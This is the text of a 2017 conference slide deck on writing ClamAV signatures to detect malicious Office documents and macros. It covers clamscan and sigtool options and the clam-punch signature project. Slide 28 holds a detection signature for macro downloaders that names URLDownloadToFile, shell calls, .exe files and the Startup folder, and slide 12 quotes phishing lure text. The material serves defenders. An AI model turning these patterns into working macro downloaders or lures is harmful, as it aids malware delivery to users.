It's 2017: Weren't signature based technologies supposed to be dead by now? To the chagrin of many, signature based detection isn't an antiquated practice just yet. This presentation focuses on a signature based technology that has been around for a very long time: ClamAV, and how it can be practical / useful in today's security space. This talk will explore the current ClamAV capabilities, use cases, signatures, all with an emphasis on detecting malicious Office documents and exploits. Additionally, there will be an introduction to the open source project: 'clam-punch' which is a curated set of signatures for ClamAV to punch miscreants as well as a tool 'clamdigger' to assist analysts in creating their own signatures.
4. ClamAV 0.99+
• Yay, good reasons to use it!
• Updated functionality
• Decompression / unrolling of more filetypes!
• PCRE!
• Yara functionality!
• Yara -> ClamAV (with some exceptions)
• ClamAV decompression / unrolling + YARA logic == win
• Expanded sigtool functionality!
5. So.. why ClamAV?
• Why not? I just gave you some good reasons
• It’s free
• Some MTAs have Clam functionality built in
• Similar functionality to Yara, just does some other stuff better
• Quick triage of attachments
• Evil documents, macros, exploits, etc.
• Detection capabilities
• Track threats across the board
• Classify threats
• Known evil doc vs known evil macro inside a doc vs known Flash exploit
• Actor tracking
• APTz, Builders, Gangs, campaigns, etc
12. ClamAV for Malware Analysis
• Determine common doc social engineering lure text
• Used ~1,000 malicious docs
• Determined common strings using statistical analysis
• Most common:
• Document created in earlier version of Microsoft Office (Word|Excel)
• To (view|decrypt|display) this (content|document), please click "Enable
Editing" (form|from) the yellow bar and then click "Enable Content”
• To properly display the document, please Enable Content.
• To display the contents of the document click on Enable Content button.
18. ClamAV for Analysts
• Run locally, using command line scanner
• Dissect raw macros within documents
• How does *ClamAV* see things?
• What if you don’t want to beautify/deobfuscate the macros?
• Built in tools
• sigtool
• clamscan
• External tools
• oletools
• viper
• Cuckoo
• lots more
19. clamscan
• Command line version of ClamAV
• $clamscan –d rules.ldb attachment
• What I find most useful:
• --debug
• Provides a ton of useful information on the target file
• Also will provide information when a file is scanned
• --info
• Provides a ton of useful information on the target file
• --leave-temps
• Saves temp files generated during analysis
• UPX packed file -> saves compressed file
20. sigtool
• Swiss-army knife for ClamAV
• What I find most useful are:
• --vba
• Dumps out the raw macros inside of a document
• --html-normalise
• Creates an ascii output html/js file which is ‘normalized’ for how ClamAV will read it
• Removes case, whitespaces, et
• --decode-sigs
• Feeds in sigs from stdin and decodes the signatures contents
• --hex-dump
• Reads in from stdin and spits out hex dump
23. Detour: Sound Rule Writing Theory
• Know what you want to detect:
• Super specific content, ideally only one version of something (think hash, or very
specific contents)
• Generic signature
• Detects a specific type of content, but with some wiggle room as far as things like variable
names, or domain names
• Loose / Heuristical Signature
• Detects abnormalities, or the presence of something in particular
• Sometimes INFO level, but other times Jumping off point to hunt
• i.e this APT uses this specific control to auto-run macros when this document opens
• Ideally, the perfect rule will be loose enough to allow slight changes, but
specific enough to capture the right amount of maliciousness indicative of
that specific threat
24. ClamAV Signatures
• Have you used YARA? It’s pretty similar
• Various types of ClamAV signatures, not limited to, but:
• hdb (hash database)
• Hash based signatures– simple
• ldb (logical database)
• Logical signatures– getting trickier now
• Boolean logic
• Regex
• Content modifiers
• Other stuff I’m not getting into because these I find most useful
28. ldb signatures
• MiscreantPunch.EvilMacro.VBDL.170404; Engine:81-255,Target:2; (0&1&2&3&4&(5|6)&7&8&9&10);
4174747269627574652056425f::i;55524c446f776e6c6f6164546f46696c65::i;5c50726f6772616d73::i;5c537
46172747570::i;2e657865::i;2e72756e::i;7368656c6c::i;68747470::i;7/x3a//[^x22x27]+.exeb/si;433a::
i;9/[^x22x27]+.exeb/si
Signature name Engine compatibility, and Target type Logical expression
Desired contents used for detection
as well as PCRE
0: Attribute VB_ 1: URLDownloadToFile 2: Programs
35. Resources
• ClamAV Signature Docs (really important!)
• github.com/vrtadmin/clamav-devel/blob/master/docs/signatures.pdf
• Miscreant Punch Sigs
• github.com/wmetcalf/clam-punch
• Tutorial on sigwriting I made
• www.malwarefor.me/writing-signatures-for-clam-av-0-99-a-tutorial
• SaneSecurity 3rd party Sigs
• sanesecurity.com/usage/signatures
• ClamAV Mailing List
• lists.clamav.net/cgi-bin/mailman/listinfo/clamav-users
• Mal(?:doc|ware) Samples
• malware-traffic-analysis.net
• hybrid-analysis.com
• malwr.com
36. come hang w me (trainings)
• OISF Training– Denver, CO: June 20-21st
• Mix of Suricata User training with a kicker of signature development
• DerbyCon 7.0 – Lousiville, KY: September 20-21st
• Practical Signature Development for Open Source IDS
• TL;DR how to write Suricata/Snort sigs that don’t suck J
• SuriCon 2017 – Prague, CZ: November 15-17th
• https://suricon.net/
• CFP open (talk to me!)
• Sponsors needed! (support Open Source!)